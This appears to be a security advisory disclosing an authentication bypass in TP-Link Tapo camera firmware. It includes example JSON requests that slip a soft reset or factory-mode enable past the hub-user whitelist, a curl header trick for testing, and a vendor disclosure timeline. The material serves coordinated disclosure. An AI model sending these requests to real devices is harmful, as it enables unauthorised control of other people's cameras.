An attacker sending a malformed HTTP POST request over LAN to a TP-Link Smart camera device can trigger the vulnerability described here.

This report describes an authentication bypass vulnerability in the HTTP server implementation.

The vulnerability we are disclosing in this advisory affected a wide range of TP-Link devices, including TAPO Smart Cameras. A TP-Link Security Advisory released was promised to be released in April 2026 after several delays, but this did not happen, without the vendor providing any explanation.

Vulnerability Details

The TAPO architecture can authenticate different account roles, one of them is the hub user. A whitelist introduced in recent builds (2025) limits this role to a few less sensitive actions.

This limit can be bypassed due to a vulnerability.

The hub user is only allowed to execute Style-III requests, and the code handling it attempts to block execution of most requests.

However, the following request contains two action_names:

// Style III
{
  "method": "multipleRequest",
  "params": {
    "requests": [{
      "method": "action_name1", // *
      "params": {
        "module_name": {
          "action_name": ...
        }
      }
    }]
  }
}

*: Method is converted using a mapping defined by /etc/dsd_convert.json. Working examples include syncHubReset and setTimezone.

Actually, the first (action_name1) is only used to determine the method, and the action_name is used to determine the actual action. However, the whitelist is compared only against the action_name1.

Thus, the whitelist can be bypassed if we provide syncHubReset for do method actions, or setTimezone for set method actions. The following examples provide a quick view:

{
  "method": "multipleRequest",
  "params": {
    "requests": [{
      // A DO action...
      "method": "syncHubReset",
      "params": {
        // ... to reset the camera
        "system": {
          "soft_reset": ...
        }
      },
    }]
  }
}

{
  "method": "multipleRequest",
  "params": {
    "requests": [{
      // a SET action...
      "method": "setTimezone",
      "params": {
        // ... to set the factory mode
        "tp_manage": {
          "factory_mode": {"enabled": "1"}
        }
      },
    }]
  }
}

Note: in order to test this vulnerability without a Tapo Hub device, force the User-Agent with the curl setting -H 'User-Agent: Hub' during login (authentication).

Affected Devices

  • verified: TAPO C520WS
  • potentially: TP-Link smart devices using the TAPO architecture

Timeline

  • 2025.12.12. Vulnerability reported to TP-Link PSIRT by email.
  • 2026.02.04. TP-Link acknowledges the report.
  • 2026.03.04. TP-Link confirms vulnerability and asks for time extension. TP-Link also provides erroneous analysis for several other reported vulnerabilities.
  • 2026.03.04. TASZK provides update explaining the errors in TP-Link’s assessment regarding other reported vulnerabilities, describing which CVE assignment and advisory detail assessments are incorrect.
  • 2026.03.05. TP-Link again asks for a 3 week extension, does not confirm any TASZK analysis.
  • 2026.03.06. TASZK confirms that a 3 week extension will be granted for vulnerabilities where a CVE assignment and/or Advisory correction will happen.
  • 2026.03.20. TP-Link communicates that this vulnerability (along with some reported at the time) have been fixed and wishes TASZK to provide a black box analysis of a new firmware image. TP-Link does not confirm which submitted vulnerabilities will receive a CVE and/or Advisory correction but ask for another arbitrary extension for only 1 vulnerability.
  • 2026.03.23. TASZK confirms that the 3 week extension will be granted if the list of vulnerabilities that are receiving a CVE and/or Advisory correction will be shared, otherwise no other extension will be granted.
  • 2026.03.26-04.01. TP-Link attempts to get in touch via several non-official channels, including an attempt to show up at our offices in person uninvited. With no coherent explanation, TP-Link requests an embargo extension of 3 weeks for this vulnerability, promising advisory release for April 20th.
  • 2026.04.02. End date of original 90 day + 3 week embargo. TASZK highlights that the PSIRT keeps sending plaintext emails with sensitive vulnerability information, points out that non-PSIRT channels are considered out-of-bounds for coordinated disclosure and confirms that embargo windows will not be extended further. TASZK volunteers a 24h notice to TP-Link for advisory release.
  • 2026.04.02. TP-Link releases advisory for the vulnerability: https://www.tp-link.com/us/support/faq/5047/
  • 2026.04.06. TASZK communicates notice of release to TP-Link.
  • 2026.04.20-28. The promised TP-Link advisory release does not happen.
  • 2026.04.28. Advisory released.